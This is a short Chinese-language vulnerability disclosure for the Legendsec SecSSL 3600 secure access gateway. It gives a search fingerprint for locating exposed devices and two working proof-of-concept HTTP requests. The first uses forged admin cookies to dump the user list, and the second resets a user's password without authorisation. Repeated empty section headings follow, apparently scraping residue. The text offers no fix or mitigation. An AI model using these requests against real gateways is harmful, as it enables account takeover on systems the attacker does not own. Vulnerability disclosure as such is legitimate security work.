网神 SecSSL 3600安全接入网关系统未授权访问漏洞

漏洞描述

网神 SecSSL 3600安全接入网关系统存在未授权访问漏洞，攻击者通过漏洞可以获取用户列表，并修改用户账号密码

漏洞影响

网神 SecSSL 3600安全接入网关系统

网络测绘

app="安全接入网关SecSSLVPN"

漏洞复现

登陆页面

验证POC，获取用户列表zkec

GET /admin/group/x_group.php?id=2

Cookie: admin_id=1; gw_admin_ticket=1;

修改用户密码

POST /changepass.php?type=2 

Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"ceshi","subAuthId":"1"}
old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A

网神 SecSSL 3600安全接入网关系统 未授权访问漏洞

漏洞描述​

漏洞影响​

网络测绘​

漏洞复现​

网神 SecSSL 3600安全接入网关系统未授权访问漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现